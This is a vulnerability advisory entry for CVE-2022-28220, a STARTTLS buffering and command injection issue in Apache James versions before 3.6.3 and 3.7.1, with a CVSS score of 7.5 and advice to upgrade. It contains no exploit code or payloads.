PT-2022-18884 · Apache · Apache James
Benoit Tellier
·
Published
2022-09-08
·
Updated
2022-09-30
·
CVE-2022-28220
CVSS v3.1
7.5
High
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
Name of the Vulnerable Software and Affected Versions
Apache James versions prior to 3.6.3
Apache James versions prior to 3.7.1
Description
The issue is related to a buffering attack that relies on the use of the STARTTLS command. It is similar to a previously solved problem in Apache James 3.6.1, but the fix for that issue does not account for concurrent requests and is subject to a parser differential.
Recommendations
For Apache James versions prior to 3.6.3, update to version 3.6.3 or later.
For Apache James versions prior to 3.7.1, update to version 3.7.1 or later.
Fix
Command Injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Apache James